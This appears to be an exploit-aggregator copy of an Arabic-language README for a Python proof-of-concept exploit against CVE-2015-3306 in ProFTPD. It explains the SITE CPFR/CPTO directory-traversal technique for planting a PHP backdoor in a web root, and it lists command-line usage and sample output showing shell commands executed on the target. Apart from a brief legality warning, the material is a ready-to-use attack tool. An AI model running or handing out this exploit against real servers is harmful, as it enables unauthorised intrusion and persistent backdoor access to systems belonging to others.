## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DONMEDFOR-CVE-2015-3306
# ثغرة CVE-2015-3306 لاختراق ProFTPD
يحتوي هذا المستودع على برنامج استغلال Python برهان المفهوم (PoC) لـ **CVE-2015-3306**
> ⚠️ **تحذير:** استخدم هذا فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني.
* * *
## المؤلف
**Mohamed EL-KHAROUATI**
* * *
## الجزء 1: ثغرة CVE-2015-3306 لاختراق ProFTPD
### الوصف
CVE-2015-3306 هي ثغرة اجتياز الدليل في ProFTPD الإصدار 1.3.5b والإصدارات الأقدم. يتيح هذا الاستغلال نسخ الملفات التعسفية وإسقاط باب خلفي PHP في جذر الويب. يمكن للباب الخلفي تنفيذ أوامر شل تعسفية.
### الميزات
* يستغل ثغرة اجتياز الدليل عبر أوامر FTP `SITE CPFR/CPTO`.
* يسقط بابًا خلفيًا PHP (`backdoor.php`) في جذر الويب المحدد.
* ينفذ أوامر شل تعسفية عبر الباب الخلفي.
* يدعم الأوامر المخصصة عبر `--rcommand`.
### المتطلبات
* Python 3.x
* مكتبة `requests` (`pip install requests`)
### الاستخدام، الإخراج، والتنظيف (كتلة كود واحدة)
root@kitploit:~
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done